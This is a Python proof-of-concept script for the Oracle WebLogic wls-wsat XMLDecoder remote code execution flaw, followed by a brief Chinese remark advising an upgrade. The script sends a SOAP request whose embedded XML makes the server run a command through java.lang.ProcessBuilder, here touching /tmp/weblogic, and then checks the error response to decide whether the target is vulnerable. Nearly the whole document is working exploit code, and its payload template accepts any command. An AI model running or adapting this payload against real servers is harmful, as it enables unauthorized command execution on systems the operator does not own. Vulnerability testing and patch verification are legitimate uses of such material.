#!/usr/bin/env python # coding:utf-8 # @Date : 2017/12/22 17:11 # @File : weblogic_poc.py # @Author : sevck # @Link : http://www.qingteng.cn #------------------------------------------------------------------------- import requests import re from sys import argv heads = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'Content-Type': 'text/xml;charset=UTF-8' } def poc(url): if not url.startswith("http"): url = "http://" + url if "/" in url: url += '/wls-wsat/CoordinatorPortType' post_str = ''' <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="2"> <void index="0"> <string>/bin/touch</string> </void> <void index="1"> <string>/tmp/weblogic</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ''' try: response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads) response = response.text response = re.search(r"<faultstring>.*</faultstring>", response).group(0) except Exception, e: response = "" if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response: result = "Vulnerability" return result else: result = "No Vulnerability" return result if __name__ == '__main__': if len(argv) == 1: print "python weblogic_poc.py url:port" exit(0) else: url = argv[1] result = poc(url=url) print result
说点修复建议:
个人建议直接更新最新版吧,老版本还是问题太多。昨晚和廖师父聊天中告知又提交了一个weblogic的RCE,已经拿到CVE就在等待发布了